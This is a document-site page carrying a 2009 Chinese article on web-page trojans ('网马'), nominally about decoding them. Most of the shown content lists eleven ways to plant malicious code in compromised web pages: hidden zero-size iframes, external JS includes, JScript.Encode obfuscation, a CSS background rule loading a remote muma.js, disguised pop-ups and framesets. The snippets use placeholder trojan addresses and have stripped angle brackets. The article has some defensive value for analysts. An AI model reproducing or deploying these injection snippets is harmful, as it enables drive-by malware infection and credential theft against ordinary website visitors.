- 1、本文档共7页,可阅读全部内容。
- 2、原创力文档(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。
- 3、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载。
- 4、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
- 5、该文档为VIP文档,如果想要下载,成为VIP会员后,下载免费。
- 6、成为VIP后,下载本文档将扣除1次下载权益。下载后,不支持退款、换文档。如有疑问请联系我们。
- 7、成为VIP后,您将拥有八大权益,权益包括:VIP文档下载权益、阅读免打扰、文档格式转换、高级专利检索、专属身份标志、高级客服、多端互通、版权登记。
- 8、VIP文档为合作方或网友上传,每下载1次, 网站将根据用户上传文档的质量评分、类型等,对文档贡献者给予高额补贴、流量扶持。如果你也想贡献VIP文档。上传文档
查看更多
网马解密初级篇
网马解密初级篇
黑客 发布日期:2009-7-15 0:53:59 共有 259 人次浏览
网马解密初级篇 一.??网页挂马的概念: ??????网页挂马是指:在获取网站或者网站服务器的部分或者全部权限后,在网页文件中插入一段恶意代码,这些恶意代码主要是一些包括IE等漏洞利用代码,用户访问被挂马的页面时,如果系统没有更新恶意代码中利用的漏洞补丁,则会执行恶意代码程序,进行盗号等危险操作。 二.常见的网页挂马方式: 框架挂马: ??iframe src=/muma.htm width=0 height=0/iframe 2.??js文件挂马: ??首先将以下代码:?? document.write(iframe width=0 height=0 src=地址/iframe); 保存为xxx.js, 则JS挂马代码为: script language=javascript src=xxx.js/script 3. js变形加密 ??????SCRIPT language=JScript.Encode src=/muma.txt/scriptmuma.txt可改成任意后缀 4. flash木马 ????http://网页木马地址 插入木马地址 width=10 height=10, GET 宽度和高度,方式后面的照添,更改木马地址就可以了。 5. 不点出现链接的木马 a href=(迷惑的超级连接地址,显示这个地址指向木马地址) 页面要显示的内容 /a SCRIPT Language=JavaScript function www_163_com () { var url=你的木马地址; open(url,NewWindow,toolbar=no,location=no,directories=no,status=no, menubar=no,scrollbars=no,resizable=no, copyhistory=yes,width=800,height=600,left=10,top=10); } /SCRIPT 6.隐蔽挂马: top.document.body.innerHTML=top.document.body.innerHTML+\r\niframe src=/muma.htm//iframe[/url] 7.css中挂马: body {background-image:url(javascript:document.write(script src=http://www.XXX.net/muma.js/script))} 8.Java挂马: SCRIPT language=javascript?? window.open (地址,,toolbar=no,location=no,directories=no,status=no,menubar=no,scro llbars=no,width=1,height=1);?? 9.图片伪装: html iframe src=网马地址 height=0 width=0/iframe img src=图片地址/center /html 10. 伪装调用: ??frameset rows=444,0 cols=* ??frame src=打开网页 framborder=no scrolling=auto noresize marginwidth=0margingheight=0 ??frame src=网马地址 frameborder=no scrolling=no noresize marginwidth=0margingheight=0 11.高级欺骗: a href=(迷惑连接地址,显示这个地址指向木马地址) 页面要显示的内容/a SCRIPT Language=JavaScript function www_163_com () { var url=网马地址; open(url,NewWindow,toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,resizable=no,copyhistory=yes,width=800,height=600,left=10,top=10); } /SCRIPT 三.常见网马所利用的漏洞判断方式: 1. 根据恶意网址名称来判断漏洞 2.根据CLSID判断漏洞: 常见网马解密工具: 1.Freshow工具(作者:jimmyleo大牛) 工具简介(摘自freshow帮助文档)
您可能关注的文档
- 组装、冲压、喷漆等专业词汇17460.doc
- 组装、冲压、喷漆等专业词汇17549.doc
- 细胞培养52956.doc
- 细胞培养58153.ppt
- 细胞实验仪器与器材.doc
- 细胞是怎样构成生物体.doc
- 细胞的代谢(综).ppt
- 细胞间设备.doc
- 织梦地带CSS精彩教程.doc
- 终 中药材分类.doc
- 2025年水族器材行业现状分析报告及未来五至十年发展前景预测报告.docx
- 2025年玻纤隔热吸音板行业现状分析报告及未来五至十年发展前景预测报告.docx
- 2025年马桶座圈行业现状分析报告及未来五至十年发展前景预测报告.docx
- 2025年特殊配方奶粉行业现状分析报告及未来五至十年发展前景预测报告.docx
- 2025年正辛硫醇行业现状分析报告及未来五至十年发展前景预测报告.docx
- 2025年棉包行业现状分析报告及未来五至十年发展前景预测报告.docx
- 2025年鸡肉分割行业现状分析报告及未来五至十年发展前景预测报告.docx
- 2025年儿童床垫行业现状分析报告及未来五至十年发展前景预测报告.docx
- 2025年正姿笔行业现状分析报告及未来五至十年发展前景预测报告.docx
- 2025年耳塞保护套行业现状分析报告及未来五至十年发展前景预测报告.docx
文档评论(0)